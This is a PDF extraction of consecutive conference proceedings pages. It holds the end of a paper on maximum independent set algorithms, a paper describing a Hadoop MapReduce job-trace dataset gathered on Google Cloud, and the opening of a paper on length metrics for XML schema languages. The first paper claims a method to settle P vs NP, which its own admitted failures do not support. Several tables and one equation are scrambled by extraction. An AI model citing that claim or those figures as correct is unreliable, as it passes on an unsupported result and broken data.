0.1841
11
0.7667 × 10−3 11
0.7368
Table 2. Some Graphs from the House of Graphs for Maximum Independent Set Graph name and/or No
α
Hoffman Graph (1167)
α1
8
5
50
50
2
Hoffman Singelton Graph(1173)
time 0.625×10−5
α2
time
8
0.0020
0.3691 × 10−3 50
0.1074
2
0.2185 × 10−3
2
0.0780
15
7
0.5590 × 10−3
7
0.0207
Hoffman Singleton Line Graph (1175)
25
20
0.7714 × 10−3
24
0.3375
Hoffman Singleton Minus Star Graph (1177)
14
6
0.2527 × 10−4 11
0.0167
35502
12
8
0.4930 ×10−4
9
0.0160
Hanoi Graph-Sierpinski Triangle Level 5 (35481)
81
81
81
0.7213
Hoffman Singleton, BiPartite Double Graph (1169) Hoffman Singleton Complement Graph (1171)
0.0022
number by the algorithm) due to the fact that when we select another vertex not in the neighbours of the pervious vertex that was added to the maximum independent set there is a better chance of being a vertex in the maximum independent set. The execution time is extremely fast with algorithm 1 is faster. Table 2 shows the independence number of some graphs selected from the graphs database House of Graphs [15]. We see also fair results with extremely high speed. α1 and α2 are the estimated independence number by algorithm 1 and algorithm 2 respectively. The reason for failures for a few graphs is the maximum independent set of these graphs is partitioned into sets of vectors such that each vector is a subset of a maximal independent set, thus the algorithm converges to a maximal independent set. The execution time is in minutes.
6
Conclusion and Future Work
We proposed a method to settle the P vs. NP problem by solving an np-complete problem, namely the maximum independent set problem. Our technique transforms any graph into a perfect graph such that the source graph maximum independent set is either twice in size the maximum independent set of the
340
M. Heal et al.
transformed graph or twice in size the second largest maximal independent set in the transformed perfect graph. We characterised some important properties of the perfect graph that may help in finding the maximum independent set of the source graph and proposed two algorithms that find the maximum independent set of the source graph for a special case. The results section shows that the algorithms are very fast. As a future work we will extend [13] work to find the 2nd largest maximal independent set of the perfect graph, since the maximum independent set in the source graph is either the maximum or 2nd largest maximum independent set in the transformed perfect graph.
References 1. Carlson, J.A., Jaffe, A., Wiles, A.: The millennium prize problems. Cambridge, MA, American Mathematical Society, Providence, RI, Clay Mathematics Institute (2006) 2. Goldreich, O.: P, NP, and NP-Completeness: The basics of computational complexity. Cambridge University Press (2010) 3. Garey, M.R., Johnson, D.S.: Computers and intractability, vol. 174. San Francisco: freeman (1979) 4. Fortnow, L.: The status of the P versus NP problem. Commun. ACM 52(9), 78–86 (2009) 5. Baker, T., Gill, J., Solovay, R.: Relativizations of the P=?NP question. SIAM J. Comput. 4(4), 431–442 (1975) 6. Razborov, A.A.: Lower bounds for the monotone complexity of some Boolean functions. Soviet Math. Dokl. vol. 31 (1985) 7. Razborov, A.A.: On the method of approximations. In: Proceedings of the TwentyFirst Annual ACM Symposium on Theory of Computing (1989) 8. Furst, M., Saxe, J.B., Sipser, M.: Parity, circuits, and the polynomial-time hierarchy. Math. Syst. Theory 17(1), 13–27 (1984) 9. Haken, A.: The intractability of resolution. Theoret. Comput. Sci. 39, 297–308 (1985) 10. Berge, C.: Farbung von Graphen, deren samtliche bzw. deren ungerade Kreise starr sind. Wissenschaftliche Zeitschrift (1961) 11. Robertson, N., et al.: The strong perfect graph theorem. Ann. Math. 164(1), 51– 229 (2006) 12. Heal, M.H.: Simple proofs of the strong perfect graph theorem using polyhedral approaches and proving P= NP as a conclusion. In: 2020 International Conference on Computational Science and Computational Intelligence (CSCI). IEEE (2020) 13. Gr¨ otschel, M., Lov´ asz, L., Schrijver, A.: Geometric algorithms and combinatorial optimization, vol. 2. Springer Science & Business Media (2012) 14. Heal, M., Li, J.: Finding the maximal independent sets of a graph including the maximum using a multivariable continuous polynomial objective optimization formulation. In: Science and Information Conference. Springer, Cham (2020) 15. Brinkmann, G., Coolsaet, K., Goedgebeur, J., M´elot, H.: House of Graphs: a database of interesting graphs. Discrete Appl. Math. 161(1–2), 311–314 (2013). http://hog.grinvin.org
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth Mohammed Bergui1(B) , Nikola S. Nikolov2 , and Said Najah1 1
2
Laboratory of Intelligent Systems and Applications, Department of Computer Science, Faculty of Sciences and Technologies, University of Sidi Mohammed Ben Abdellah, Fez, Morocco [email protected] Department of Computer Science and Information Systems, University of Limerick, Limerick, Ireland Abstract. Hadoop MapReduce is a well-known open source framework for processing a large amount of data in a cluster of machines; it has been adopted by many organizations and deployed on-premise and on the cloud. MapReduce job execution time estimation and prediction are crucial for efficient scheduling, resource management, better energy consumption, and cost saving. In this paper, we present our new dataset of MapReduce job traces in a cloud environment with limited network bandwidth; we describe the process of generating and collecting the dataset in this paper. We believe that this dataset will help researchers develop new scheduling approaches and improve Hadoop MapReduce job performance. Keywords: Hadoop · MapReduce Estimating the runtime
1
· Cloud computing · Bandwidth ·
Introduction
Now, with the development and use of new systems, we are dealing with a large amount of data. Due to the volume, velocity, and variety of this big data, its management, maintenance, and processing require dedicated infrastructures. Apache Hadoop is one of the most well-known big data frameworks [1], it splits the input data into blocks for distributed storage and parallel processing using the Hadoop distributed file system and MapReduce on a cluster of machines [15]. One of the characteristics of Hadoop MapReduce is the support for public cloud computing, which allows organizations to use cloud services on a pay-asyou-go basis. This is advantageous for small and medium-sized organizations that cannot implement a sophisticated, large-scale private cloud due to financial constraints. Therefore, running Hadoop MapReduce applications in a cloud environment for big data analytics has become a viable alternative for industrial practitioners and academic researchers. Since one of the most critical functions of Hadoop is job and resource management, more efficient management will be achieved if the estimation and prediction of the execution time of a job are done accurately. Also, critical resources c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 341–348, 2023. https://doi.org/10.1007/978-3-031-28073-3_24
342
M. Bergui et al. Table 1. The Different VM types for hadoop cluster deployments
Machine types
vCPUs Memory (GB) Maximum egress bandwidth (Gbps)
e2-standard-2
2
8
e2-standard-4
4
16
8
e2-standard-8
8
32
16
e2-standard-16 16
64
16
e2-highmem-2
2
16
4
e2-highmem-4
4
32
8
e2-highmem-8
8
64
16
e2-highmem-16 16
128
16
Standard persistent storage
4
500 GB
like CPU, memory, and network bandwidth are shared in a cloud environment and subject to contention. This is an important issue regarding efficient scheduling, better energy consumption, cost saving, congestion detection, and resource management [7,9,12]. Several Hadoop MapReduce performance models have been proposed either for on-premise or cloud deployment [8,10,11,13,14,16]. However, the data generated and collected is not well described. Also, most proposed solutions rely on benchmarks that only process a certain data structure. This article proposes a new dataset of Hadoop MapReduce version 2 job traces in a cloud environment with limited network bandwidth. For this purpose, first, we deploy multiple Hadoop cluster configurations on Google Cloud Platform [5], then we use a big data benchmark to generate synthetic data with different structures; this data is then processed using SQL-like queries. Lastly, we construct our dataset by extracting MapReduce job traces and cluster configuration parameters using our python toolkit that is based on REST APIs provided by the Hadoop Framework [2,3]. The remainder of this paper is organized as follows. Experimental Setup section provides the different types of cluster deployment used in our experiment. The Hadoop MapReduce Job Traces Database section describes the steps to generate synthetic data, process it then collect MapReduce job traces that construct the dataset. Finally, Conclusion and Future Work section concludes the paper.
2
Experimental Setup
In order to estimate the job execution time, we started by deploying eight different clusters with four nodes, one master node, and three workers on Google Cloud Platform; Dataproc is a Spark and Hadoop managed service on Google Cloud Platform that can easily create and manage clusters [5]. The version of Dataproc used is 1.5-centos8 which includes CentOS 8 as the operating system, Apache Spark 2.4.8, Apache Hadoop 2.10.1, Apache Hive 2.3.7, and Python 3.7 [4]. Each cluster has a different workers/salves configuration ranging from 2
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth
343
Table 2. Benchmark dataset tables names and sizes Table
Size
Table
data/customer
128.5 MB data/warehouse
data/customer address
51.9 MB
data/web clickstreams
data/customer demographics
74.2 MB
data/web page
data/date dim
14.7 MB
data/web returns
data/household demographics 151.5 KB data/web sales data/income band
Size 2.2 KB 29.7 GB 98.4 KB 870.4 MB 21.1 GB
327 B
data/web site
8.6 KB
data/inventory
16.3 GB
data refresh/customer
data/item
65.0 MB
data refresh/customer address
537.2 KB
data/item marketprices
66.6 MB
data refresh/inventory
168.7 MB
data/product reviews
633.2 MB data refresh/item
data/promotion
568.5 KB data refresh/item marketprices
data/reason
38.2 KB
data refresh/product reviews
6.3 MB
data/ship mode
1.2 KB
data refresh/store returns
7.3 MB
data/store
33.0 KB
data refresh/store sales
data/store returns
708.6 MB data refresh/web clickstreams
data/store sales
14.7 GB
data refresh/web returns
data/time dim
4.9 MB
data refresh/web sales
1.3 MB
673.2 KB 26.2 MB
152.5 MB 308.5 MB 8.8 MB 219.1 MB
vCPUs to 16, 8 GB of memory to 128, and the type and size of storage were kept the same; the master node configuration was the same through the experiment with 4 vCPUs and 16 GB of memory, the types of VMs used in our experiments is shown in Table 1. After each deployment, we changed the replication factor in HDFS from the default value, which is 3 to 1. We also had to change the Hive execution engine from Tez to Mapreduce for the experiment. We then limit the workers’ maximum network bandwidth four times on each cluster deployment to 4.6 Gbps, 2.3 Gbps, 1.1 Gbps, and 0.7 Gbps.
3
The Hadoop MapReduce Job Traces Database
This paper proposes a Hadoop MapReduce job traces dataset in a cloud environment with limited network bandwidth1 . This dataset includes many Hadoop MapReduce jobs based on multiple processing methods (MapReduce, Pure QL, NLP, . . .) and different data structures. This dataset will help researchers develop new scheduling approaches and improve Hadoop MapReduce performance. This dataset has been constructed to predict the among of intermediate data that need to be transferred over a limited network and predict the job execution time regardless of the type of the query statement. 1
The dataset is available upon request from the corresponding author.
344
M. Bergui et al. Table 3. The Distribution of the Different Query Types and the Data Types
Query Data type
Method
Query Data type
UDF/UDTF
14
Structured
Pure QL
2
Semi-Structured Map Reduce
15
Structured
Pure QL
3
Semi-Structured Map Reduce
16
Structured
Pure QL
4
Semi-Structured Map Reduce
17
Structured
Pure QL
6
Structured
Pure QL
19
Un-Structured
UDF/UDTF/NLP
7
Structured
Pure QL
21
Structured
Pure QL
8
Semi-Structured Map Reduce
22
Structured
Pure QL
9
23
1
Structured
Structured
Pure QL
10
Un-Structured
UDF/UDTF/NLP 27
11
Structured
Pure QL
12
Semi-Structured Pure QL
13
Structured
3.1
Method
Structured
Pure QL
Un-Structured
UDF/UDTF/NLP
29
Structured
UDF/UDTF
30
Semi-Structured UDF/UDTF/Map Reduce
Pure QL
Data Generation
To evaluate the efficiency of Hadoop-based Big Data systems, we used the TPCxBB Express Benchmark BB [6]. By executing 30 frequently used analytic queries in the context of retailers, it evaluates the performance of software and hardware components. For structured data, SQL queries can make use of Hive or Spark, while for semi-structured and unstructured data, machine learning methods make use of ML libraries, user-defined functions, and procedural programs. Data Generation in HDFS. In order to populate HDFS with structured, semi-structured, and unstructured, TPCx-BB uses an extension of the Parallel Data Generation Framework (PDGF). PDGF is a parallel data generator that generates a large amount of data for an arbitrary schema. The already existing PDGF can generate the structured part of the benchmark model. However, it cannot generate the unstructured text of the product reviews. First, PDGF is extended to produce a key-value data set for a fixed set of mandatory and optional keys. This is enough to generate the weblog part of the benchmark. To generate unstructured data, an algorithm based on the Markov Chain technique is used to produce synthetic text based on sample input text; the initial sample input is a real products review from an online retail store. The benchmark defines a set of scaling factors based on the approximate size of the raw data generated by PDGF in Gigabytes. In our experiment, we used a scale factor of 100, resulting in approximately 90 GB of data evenly spread over three data nodes. Table 2 shows the names and sizes of the tables. It should be noted that the sizes of the tables differ from each execution of the data generation, i.e., the size of the tables is different on each cluster deployment. The generated data set is mainly unstructured, and structured data accounts only for 20%.
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth
345
Specification of Hadoop MapReduce Jobs. We used a Hive-based query to run our experiments from the 30 queries provided by the benchmark [6]; we were able to run 23 queries, and the remaining seven queries rely on frameworks that are not in the scope of our experiment. The queries are complex, containing various clauses such as SELECT, ORDER BY, GROUP BY, CLUSTER BY, and all kinds of JOIN clauses. The distribution of the different query types and the data types they access are illustrated in Table 3. 3.2
Data Collection
The queries generated 101 jobs and 1595 to 1604 tasks per cluster configuration, totaling 3232 jobs and 50732 tasks. In order to collect information about these jobs, we developed a toolkit with python for collecting information about the applications, jobs, jobs counters, and tasks. The toolkit makes use of the REST APIs provided by the Hadoop framework [2,3] and SSH to collect data about applications, jobs, jobs counters, tasks, cluster metrics, and framework Table 4. Application, Cluster and YARN Collected Features Object Type
Application, Scheduler, Cluster metrics and framework configuration
How data were acquired
- ResourceManager REST APIs allow getting information about the cluster, scheduler, nodes, and applications. - Connecting through SSH and parsing yarn-site.xml
File
CSV file, applications.csv Feature name
Type
Description
id elapsedTime
string long
memorySeconds
long
vcoreSeconds
long
The application id The elapsed time since the application started (in ms) The amount of memory the application has allocated The number of CPU resources the application has allocated
Cluster metrics
totalMB totalVirtualCores totalNodes networkBandwidth
long long int long
The amount of total memory in MB The total number of virtual cores The total number of nodes The maximum available network bandwidth for each node
YARN configuration
yarn-nodemanagerresource-memory yarn-nodemanagerresource-cpu-vcores yarn-schedulermaximum-allocation yarn-schedulerminimum-allocation
long
Amount of physical memory, in MB, that can be allocated for containers Number of vcores that can be allocated for containers The maximum allocation for every container request at the RM in MBs The minimum allocation for every container request at the RM in MBs
Application
int long long
346
M. Bergui et al. Table 5. Job and job counters collected features
Object Type
Job and MapReduce configuration
How data were - MapReduce History Server REST APIs allow to get status acquired on finished jobs. - Connecting through SSH and parsing mapred-site.xml File
Job features
MapReduce configuration
Object Type
CSV file, jobs.csv Feature name
Type
Description
id startTime finishTime mapsTotal reducesTotal avgShuffleTime
string long long int int long
The The The The The The
mapreduce-job-maps mapreduce-map-cpuvcores mapreduce-reducememory mapreduce-job-reduceslowstartcompletedmaps mapreduce-task-io-sort
int int
The number of map tasks per job The number of virtual cores to request from the scheduler for each map task The amount of memory to request from the scheduler for each reduce task Fraction of the number of maps in the job which should be complete before reduces are scheduled for the job The total amount of buffer memory to use while sorting files, in megabytes
long float
long
job id time the job started time the job finished total number of maps total number of reduces average time of the shuffle (in ms)
Job Counters
How data were MapReduce History Server REST API’s allows to get status acquired on finished jobs File
Counters features
CSV file, counters.csv Feature name
Type
Description
id map-input-records
string long
map-output-records
long
reduce-shuffle-bytes file-bytes-read-map
long long
hdfs-bytes-read-map
long
The job id The number of records processed by all the maps The number of output records emitted by all the maps Map output copied to Reducers The number of bytes read by Map tasks from the local file system The number of bytes read by Map and Reduce tasks from HDFS
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth
347
Table 6. Task collected features Object Type
Task
How data were acquired
MapReduce History Server REST API’s allows to get status on finished tasks
File
CSV file, tasks.csv Feature name
Type
Description
Task features
id Job-id type elapsedTime
string string string long
The task id The job id The task type - MAP or REDUCE The elapsed time since the application started
configuration by making an HTTP request, connecting to the master node through SSH and parsing JSON and XML files. The features collected and their descriptions for application, cluster metrics, and YARN configuration are shown in Table 4. Job, job counters collected features are shown in Table 5; finally, task collected features are presented in Table 6.
4
Conclusion and Future Work
Apache Hadoop is a well-known open-source platform for handling large amounts of data. The runtime of a job needs to be estimated accurately for better management. This paper proposes a Hadoop MapReduce job traces dataset in a cloud environment with limited network bandwidth. A big data benchmark and different cluster deployments are used to generate MapReduce job traces; the dataset contains information about cluster and framework configuration and applications, jobs, counters, and tasks. The purpose of this dataset is to researchers develop new scheduling approaches and improve Hadoop MapReduce job performance. We plan to extend the proposed dataset for future work to include network bandwidth fluctuations and heterogeneous machine configurations. Also, by extending the dataset, we plan to work on predicting job execution time in a geo-distributed Hadoop cluster.
References 1. 2. 3. 4. 5.
Apache hadoop Apache hadoop 2.10.1 – resourcemanager rest apis Apache hadoop mapreduce historyserver – mapreduce history server rest apis Dataproc image version list — dataproc documentation — google cloud Dataproc — google cloud
348
M. Bergui et al.
6. Tpcx-bb express big data benchmark 7. Alapati, S.R.: Expert Hadoop Administration: Managing, Tuning, and Securing Spark, YARN, and HDFS, , 1st edn. Addison-Wesley Professional (2016) 8. Ceesay, S., Barker, A., Lin, Y.: Benchmarking and performance modelling of mapreduce communication pattern. In: 2019 IEEE International Conference on Cloud Computing Technology and Science (CloudCom), pp. 127–134 (2019) 9. Heidari, S., Alborzi, M., Radfar, R., Afsharkazemi, M., Ghatari, A.: Big data clustering with varied density based on mapreduce. J. Big Data 6, 08 (2019) 10. Kadirvel, S., Fortes, J.A.B.: Grey-box approach for performance prediction in mapreduce based platforms. In: 2012 21st International Conference on Computer Communications and Networks (ICCCN), pp. 1–9 (2012) 11. Khan, M., Jin, Y., Li, M., Xiang, Y., Jiang, C.: Hadoop performance modeling for job estimation and resource provisioning. IEEE Trans. Parallel Distrib. Syst. 27(2), 441–454 (2016) 12. Singh, R., Kaur, P.: Analyzing performance of apache tez and mapreduce with hadoop multinode cluster on amazon cloud. J. Big Data 3, 10 (2016) 13. Song, G., Meng, Z., Huet, F., Magoules, F., Yu, L., Lin, X.: A hadoop mapreduce performance prediction method. In: 2013 IEEE 10th International Conference on High Performance Computing and Communications & 2013 IEEE International Conference on Embedded and Ubiquitous Computing, pp. 820–825 (2013) 14. Tariq, H., Al-Sahaf, H., Welch, I.: Modelling and prediction of resource utilization of hadoop clusters: a machine learning approach. In: Proceedings of the 12th IEEE/ACM International Conference on Utility and Cloud Computing, UCC 2019, pp. 93–100. Association for Computing Machinery, New York (2019) 15. White, T.: Hadoop: The Definitive Guide. O’Reilly Media Inc., 4th edn. (2015) 16. Zhang, Z., Cherkasova, L., Loo, B.T.: Benchmarking approach for designing a mapreduce performance model. In: Proceedings of the 4th ACM/SPEC International Conference on Performance Engineering, ICPE 2013, pp. 253–258. Association for Computing Machinery, New York (2013)
Survey of Schema Languages: On a Software Complexity Metric Kehinde Sotonwa(B) , Johnson Adeyiga, Michael Adenibuyan, and Moyinoluwa Dosunmu Bells University of Technology, Ota, Nigeria [email protected]
Abstract. Length in Schema (LIS) is a numerical measurement of the schema documents (DS) of extensible markup language (XML) that contain schemas from xml schema language in a manuscript form. LIS likened to source line of codes (SLOC) in software complexity which is used to calculate the amount of effort that will be required to develop a schema document. Different LIS were considered such as Blank Length in Schema (BLIS), Total Length in Schema (TLIS), Commented Length in Schema (CLIS) and Effective Length in Schema (ELIS) for sixty (60) different schema documents acquired online through Web Services Description Language (WSDL) and implemented in two schema languages: Relax-NG (rng) and W3C XML schema (wxs) to estimate schema productivity and maintainability. It was discovered that overall understandability and flexibility of schemas become much easier with less maintenance efforts in rng than wxs. Keywords: Relax-NG (rng) · W3C XML schema (wxs) · Schema documents (DS)
1 Introduction The increased complexity of modern software applications also increases the difficulty of making the code reliable and maintainable. Code metrics is a set of software measures that provide developers better insight into the code they are developing. By taking advantage of code metrics, developers can understand which types and/or methods should be reworked or more thoroughly tested. Code complexity should be measured as early as possible in coding [1, 4] to locate complex code in order to obtain high quality software with low cost of testing and maintenance. It is also used to compare, evaluate and rank competitive programming applications [2–4]. Code based complexity measure comprises of line of codes/source line of code metric, Halstead complexity measure and McCabe cyclomatic complexity measure but this paper is only considering line of codes metric in relation to xml schema documents. Xml is a dedicated data-description language used to store data [5]. It is often used of web development to save the data into xml files. The use of XSLT API’s is to generate the content in required format such as HTML, XHTML and XML to allows the developers transfer data and to save configuration or business data for application [6]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 349–361, 2023. https://doi.org/10.1007/978-3-031-28073-3_25
350
K. Sotonwa et al.
Xml is a markup language created by the world wide consortium (W3C) to define syntax for encoding documents that both humans and machines could read. It does this through the use of tags that define the structure of the document, as well as how the document should be stored and transported. The data representation and transportation formats which accepted in diverse fields were been made by designing the schema, and this can be written by a series of xml schema languages. A schema is a formal definition of the syntax of xml based language that defines a family of xml documents. Xml schema language is a description of a type of xml document, typically expressed in terms of constraints on the structure and content of documents of that type, above and beyond the basic syntactical constraints imposed by xml itself [4, 7, 8]. These constraints are generally expressed using some combinations of grammatical rules governing the order of elements. A schema language is a formal language for expressing schemas [9]. There are a number of schema languages available: dtd [10], wxs [11, 12], rng [13, 14] and schematron [15–17] etc. Length in schema similar to line of codes is generally considered as the count of line in the schema of xml documents which also considered the validated documents [4, 18]. LIS count the line of schema files implemented in rng and wxs and it is independent of what the schema documents used. The LIS evaluates the complexity of the software via the physical length. The xml documents in this paper were acquired online and implemented in rng and wxs.
2 Review of Related Works Harrison et al., [19] measured line of codes (LOC) metric, a code written in one programming language may be much more effective than another, therefore two programs that give the same functionalities written in two different languages may have different LOC values because of this, it neglected all other factors that affect the complexity of software. Vu-Nguyen et al., [20] presented a set of counting standards that defines what and how to count SLOC. It was suggested that this problem, can be alleviated by the use of a reasonable and unambiguous counting standard guide with the support of a configurable counting tool. Kaushal-Bhatt et al. [21] evaluated some drawbacks in SLOC metrics that affect the quality of software because SLOC metric output is used as an input in other software estimation methods like COCOMO model. Armit and Kamar [22] formulated a metric that counted the number of line of codes but neglected the intelligence content, layout and other factors that affect the complexity of the code. Sotonwa et al., [2, 3] proposed a metric that counts the number of line of codes, commented lines and non-commented lines for various object oriented programming languages. Sotonwa et al., [4] also used SLOC metrics to xml schema documents in order to estimate schemas productivity and maintainability. The SLOC metrics were based on only one xml schema language: (RNG). There is need to take this work further by comparing different schema languages with SLOC metrics and was done with different object oriented programming languages to show the effectiveness of the flexibility and understandability of schemas in respect to less maintenance effort.
Survey of Schema Languages: On a Software Complexity Metric
351
3 Materials and Methods 3.1 Experimental Setup of LIS Metric The LIS metric investigates the code based complexity metric like source of code (SLOC) in complexity metric using schema documents implemented in xml schema languages: (rng and wxs) for length of the schemas and to find the complexity variations of different implementation languages. The following approaches were applied: • Length in schema were implemented in rng and wxs of xml schemas languages • Evaluation of different types of LIS for different implementation of schema documents in rng and wxs. • Comparison of the results from the two (2) schemas languages: rng and wxs • Analysis of variance of the schema languages developed and confirmed as an explanation for the observed data. The metric is applied on sixty (60) different schemas files acquired online through web services description languages and implemented in rng and wxs; rng and wxs codes were different from each other in their architecture [23–40] and different types of LIS were considered for each schema document as follows: • Total length in schema (TLIS): it is obvious from its name that it counts the number of lines in source code of the schema. it counts every line including commented and blank lines. • Blank length in schema (BLIS): this counts only the space line in the source codes. These lines of code only make the codes look spacious enough and easy to comprehend; with or without BLIS in the code, the code will still execute. • Commented length in schema (CLIS): counts line of codes that contain comments only. • Effective length in schema (ELIS): counts line of codes that are not commented, blank, standalone braces or parenthesis. This metric presents the actual work performed within the code. It calculates all executable line codes. The equation is defined as:
ELIS SD.rng = TLIS SD.rng − BLIS SD.rng + CLIS SD.rng
(1)
ELIS SD.wxs = TLIS SD.wxs − (BLIS SD.wxs + CLIS SD.wxs )
(2)
where ELIS is effective length of schema SD is schema document of rng and wxs TLIs is the total length of schema BLIS is the blank length of schema and CLIs is the commented length of schema
352
K. Sotonwa et al.
Demonstration sample of the proposed metric for rentalProperties, contact-info and Note; implemented in rng is given in Fig. 1, Fig. 2, Fig. 3 and their analyses were also given for different variations of LIS metric.
Fig. 1. Schema document for RentalProperties in rng.
Survey of Schema Languages: On a Software Complexity Metric
TLISrentalProperties.rng = 46 BLISrentalProperties.rng = 0 CLISrentalProperties.rng = 2 ELIS = TLISrentalProperties.rng − rentalProperties.rng BLISrentalProperties.rng + CLISrentalProperties.rng = 46 − (0 + 2) = 44
Fig. 2. Schema document for contact-info in rng
TLIScontact−info.rng = 19 BLIScontact−info.rng = 1 CLIScontact−info.rng = 5 ELIScontact−info.rng = TLIScontact−info.rng − BLIScontact−info.rng + CLIScontact−info.rng = 19 − (1 + 5) = 13
353
354
K. Sotonwa et al.
Fig. 3. Schema document for note in rng
TLISnote.rng = 23 BLISnote.rng = 3 CLISnote.rng = 3 ELISnote.rng = TLISnote.rng − BLISnote.rng + CLISnote.rng = 23 − (3 + 3) = 17 Demonstration sample of the proposed metric for rentalProperties, contact-info and note; implemented in wxs is given in Fig. 4, Fig. 5, Fig. 6 and their analyses were also given for different variations of LIS metrics.
Survey of Schema Languages: On a Software Complexity Metric
Fig. 4. Schema document for RentalProperties in wxs
TLISrentalProperties.wxs = 46 BLISrentalProperties.wxs = 1 CLISrentalProperties.wxs = 23 = TLISrentalProperties.wxs − ELIS rentalProperties.wxs BLISrentalProperties.wxs + CLISrentalProperties.wxs = 46 − (1 + 23) = 22
355
356
K. Sotonwa et al.
Fig. 5. Schema document for contact-info in wxs
TLIScontact−info.wxs = 14 BLIScontact−info.wxs = 1 CLIScontact−info.wxs = 4 ELIScontact−info.wxs = TLIScontact−info.wxs − BLIScontact−info.wxs + CLIScontact−info.wxs = 14 − (1 + 4) = 9
Fig. 6. Schema document for note in wxs
TLISnote.wxs = 14 BLISnote.wxs = 0 CLISnote.wxs = 1 ELISnote.wxs = TLISnote.wxs − (BLISnote.wxs + CLISnote.wxs ) = 14 − (0 + 1) = 13
Survey of Schema Languages: On a Software Complexity Metric
357
Table 1. Complexity measures for comparing rng and wxs schema documents S/no Schemas
ELISrng
BLISrng
CLISrng
TLISWXS
ELISWXS
BLISWXS
1
RentalProperties
TLISrng 46
44
0
2
46
22
1
CLISWXS 23
2
LinearLayout
68
58
4
6
52
27
1
24
3
Weather-observation
97
92
1
4
75
43
1
31
4
Cookingbook
37
32
1
4
32
24
2
6
5
myShoeSize
12
8
1
3
13
11
0
2
6
Documents
38
37
0
1
50
39
0
11
7
Supplier
26
24
1
1
24
15
2
7
8
Customer
19
17
1
1
23
14
1
8
9
Contact
17
15
1
1
16
8
1
7
10
Books
42
32
3
7
43
26
2
15
11
Saludar
40
30
8
2
37
28
1
8
12
Portfolio
24
21
1
2
21
11
1
9
13
Breakfast_menu
26
24
1
1
25
14
1
10
14
Investments
15
Library
16
Contact-info
19
13
1
5
14
9
1
4
17
Students
17
16
0
1
22
14
2
6
18
Configuration-file
24
20
0
4
24
18
0
6
19
Shiporder
49
43
3
3
32
21
0
11
20
Bookstore
30
26
1
3
30
17
1
12
21
Dataroot
29
25
2
2
66
52
2
12
22
Dictionary
29
25
1
3
34
21
1
12
23
Catalog
33
31
0
2
30
16
0
14
24
Soap
34
27
0
7
36
24
1
11
25
PurchaseOrder
68
62
0
6
60
30
1
29
26
Letter
67
60
0
7
62
40
0
22
27
Clients
31
27
1
3
33
20
2
11
28
ZCSImport
32
30
1
1
36
20
1
15
29
Guestbook
17
16
0
1
20
14
0
6
30
Note
24
18
3
3
14
13
0
1
25
16
1
8
20
12
1
7
110
97
4
9
53
34
3
16
4 Result and Discussion In this section, we presented the results from the series of experiment conducted to show the efficiency of the proposed metric. The applicability of LIS in schema documents showed that the effort required in understanding the information contents of the metric when implemented in rng and wxs for all schema documents are given in Table 1. Column 1 in Table displayed the serial numbers for all the schema documents, column 2 illustrated thirty (30) schema documents, columns 3 to 6 and columns 7 to 10 revealed different complexity values calculated for each LIS: (TLIS, BLIS, CLIS and ELIS) in rng and wxs.
358
K. Sotonwa et al.
The relative graph depicted in Fig. 7 exhibited all complexity values in rng and wxs for BLIS and CLIS. The results while comparing different LIS in graph representation for the sample schema documents given above: rentalProperties, contact-info and note in rng and wxs disclosed that the results BLISrentalProperties.rng = 0, BLIScontact-info.rng = 1, BLISnote.rng = 3 and BLISrentalProperties.wxs = 1, BLIScontact-info.wxs = 1, BLISnote.wxs = 0 respectively all have closer complexity values in both rng and wxs; this is because BLIS are just blank lines and with or without these lines schemas will still validate even though wxs do have empty elements and whitespaces. Empty element in wxs does not mean that the line of the schema is blank; it is just that the element has no content at all. So also, whitespace is of two types: significant whitespace and insignificant whitespace. The significant whitespaces occur within the element which contain text and markup present together while insignificant whitespaces are the spaces where only element content is allowed. On the other hand, schema documents CLISrentalProperties.rng = 2, CLIScontact-info.rng = 5, CLISnote.rng = 3 also have close complexity values in rng but CLISrentalProperties.wxs = 23, CLIScontact-info.wxs = 4, CLISnote.wxs = 1, do not have closer complexity values because wxs is quite verbose and has a weak structure support for unordered content therefore this made it to produce more CLIS in wxs the rng; thus making it more complex and difficult to understand and compare with rng that is easier, lightweight and has a richer structure option. Figure 8 unveiled comparison between TLIS and ELIS in rng and wxs; all the schema documents presented have larger complexity values in TLIS than ELIS in both rng and wxs. For examples TLIS rentalProperties.rng :ELISrentalProperties.rng = 46:44, TLIScontact-info.rng :ELIScontact-info.rng = 19:13, TLISnote.rng :ELISnote.rng = 24:18 and TLISrentalProperties.wxs :ELISrentalProperties.wxs = 46:22, TLIScontact-info.wxs :ELIScontact-info.wxs = 14:9, TLISnote.wxs :ELISnote.wxs = 14:13 respectively. In comparing complexity values in rng and wxs for TLIS and ELIS; it was discovered that TLIS has larger values in rng and wxs because this is the overall total of all the lines of schema which include the blank, commented and effective lines while ELIS are just the logical schemas i.e. actual lines in a document that make the schema to validate, in this case commented and blank lines are not considered. Finally, general comparison of the whole complexity values between rng and wxs revealed that rng had larger values for more than two third of the schema documents presented due to more diversity of the elements in rng (i.e. appearance of the elements in any order) hence, this gain more regularity and reusability traits for high frequency occurrence of similarly structured elements in rng, as a result, encouraged leveraging on existing schema documents instead of building newly schemas from the scratch.
Survey of Schema Languages: On a Software Complexity Metric
359
Fig. 7. Relative graph for schema documents of LIS in rng and wxs
Fig. 8. Comparison of TLIS and ELIS in rng and wxs
5 Conclusion Length in line of any code or schemas is widely used and universally accepted because it permits comparison of size and productivity of metrics between diverse development groups. It directly related to the end product and easily measured upon project completion. It measures software from the developers’ point of view-what actually line of code does in relation to line of schemas as well, in return aids continuous improvement activities exist for estimation techniques. For the comparison of different LIS in rng and wxs, it was discovered that rng exhibits better presentation of schema documents with high degree of flexibility, reusability and comprehensibility qualities which assists the developer to gain more familiarity with the schema languages structure because of strong support for class elements to appear in any order in rng than wxs, though, wxs is also good but weak support for unordered contents.
360
K. Sotonwa et al.
